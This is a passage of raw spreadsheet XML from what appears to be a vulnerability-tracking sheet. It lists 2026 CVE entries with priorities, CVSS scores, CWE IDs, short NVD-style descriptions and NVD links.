t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.003</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr" /><c r="M82" s="5" t="inlineStr" /><c r="N82" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr"><is><t>CWE-331</t></is></c><c r="S82" s="5" t="inlineStr"><is><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is></c><c r="T82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-69641</t></is></c><c r="D83" s="5" t="n"><v>9.1</v></c><c r="E83" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.008</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr" /><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S83" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-73309</t></is></c><c r="D84" s="5" t="n"><v>9.1</v></c><c r="E84" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.005</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L84" s="5" t="inlineStr" /><c r="M84" s="5" t="inlineStr" /><c r="N84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S84" s="5" t="inlineStr"><is><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is></c><c r="T84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-73311</t></is></c><c r="D85" s="5" t="n"><v>9.1</v></c><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.004</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L85" s="5" t="inlineStr" /><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S85" s="5" t="inlineStr"><is><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is></c><c r="T85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-73312</t></is></c><c r="D86" s="5" t="n"><v>9.1</v></c><c r="E86" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.004</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L86" s="5" t="inlineStr" /><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S86" s="5" t="inlineStr"><is><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is></c><c r="T86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-75156</t></is></c><c r="D87" s="5" t="n"><v>9.1</v></c><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.002</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr" /><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S87" s="5" t="inlineStr"><is><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is></c><c r="T87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-75746</t></is></c><c r="D88" s="5" t="n"><v>9.1</v></c><c r="E88" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.011</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr" /><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S88" s="5" t="inlineStr"><is><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is></c><c r="T88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-79571</t></is></c><c r="D89" s="5" t="n"><v>9.1</v></c><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.003</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr" /><c r="M89" s="5" t="inlineStr" /><c r="N89" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S89" s="5" t="inlineStr"><is><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is></c><c r="T89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-86729</t></is></c><c r="D90" s="5" t="n"><v>9.1</v></c><c r="E90" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.002</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr" /><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="S90" s="5" t="inlineStr"><is><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is></c><c r="T90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-86840</t></is></c><c r="D91" s="5" t="n"><v>9.1</v></c><c r="E91" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.002</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr" /><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr"><is><t>CWE-639, CWE-862</t></is></c><c r="S91" s="5" t="inlineStr"><is><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is></c><c r="T91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-53581</t></is></c><c r="D92" s="5" t="n"><v>9</v></c><c r="E92" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.003</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr" /><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S92" s="5" t="inlineStr"><is><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is></c><c r="T92" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>CVE-2026-66768</t></is></c><c r="D93" s="5" t="n"><v>9</v></c><c r="E93" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="n"><v>0.003</v></c><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr" /><c r="M93" s="5" t="inlineStr" /><c r="N93" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S93" s="5" t="inlineStr"><is><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is></c><c r="T93" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>CVE-2026-69854</t></is></c><c r="D94" s="5" t="n"><v>9</v></c><c r="E94" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F94" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="n"><v>0.006</v></c><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr" /><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S94" s="5" t="inlineStr"><is><t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T94" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>CVE-2026-85982</t></is></c><c r="D95" s="5" t="n"><v>9</v></c><c r="E95" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="n"><v>0.002</v></c><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr" /><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S95" s="5" t="inlineStr"><is><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is></c><c r="T95" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>CVE-2026-50093</t></is></c><c r="D96" s="5" t="n"><v>8.9</v></c><c r="E96" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="n"><v>0.002</v></c><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr" /><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="S96" s="5" t="inlineStr"><is><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is></c><c r="T96" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>CVE-2026-12648</t></is></c><c r="D97" s="5" t="n"><v>8.800000000000001</v></c><c r="E97" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.015</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr" /><c r="M97" s="5" t="inlineStr" /><c r="N97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S97" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-12651</t></is></c><c r="D98" s="5" t="n"><v>8.800000000000001</v></c><c r="E98" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.015</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr" /><c r="M98" s="5" t="inlineStr" /><c r="N98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S98" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-16502</t></is></c><c r="D99" s="5" t="n"><v>8.800000000000001</v></c><c r="E99" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.005</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr" /><c r="M99" s="5" t="inlineStr" /><c r="N99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S99" s="5" t="inlineStr"><is><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is></c><c r="T99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-18851</t></is></c><c r="D100" s="5" t="n"><v>8.800000000000001</v></c><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.01</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr"><is><t>ivanti:endpoint_manager_mobile</t></is></c><c r="L100" s="5" t="inlineStr" /><c r="M100" s="5" t="inlineStr" /><c r="N100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S100" s="5" t="inlineStr"><is><t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-28609</t></is></c><c r="D101" s="5" t="n"><v>8.800000000000001</v></c><c r="E101" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.003</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L101" s="5" t="inlineStr" /><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S101" s="5" t="inlineStr"><is><t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-28618</t></is></c><c r="D102" s="5" t="n"><v>8.800000000000001</v></c><c r="E102" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.003</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L102" s="5" t="inlineStr" /><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S102" s="5" t="inlineStr"><is><t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-28666</t></is></c><c r="D103" s="5" t="n"><v>8.800000000000001</v></c><c r="E103" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.003</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr" /><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S103" s="5" t="inlineStr"><is><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is></c><c r="T103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-30754</t></is></c><c r="D104" s="5" t="n"><v>8.800000000000001</v></c><c r="E104" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.003</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr" /><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S104" s="5" t="inlineStr"><is><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is></c><c r="T104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-49879</t></is></c><c r="D105" s="5" t="n"><v>8.800000000000001</v></c><c r="E105" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.003</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr" /><c r="L105" s="5" t="inlineStr" /><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" 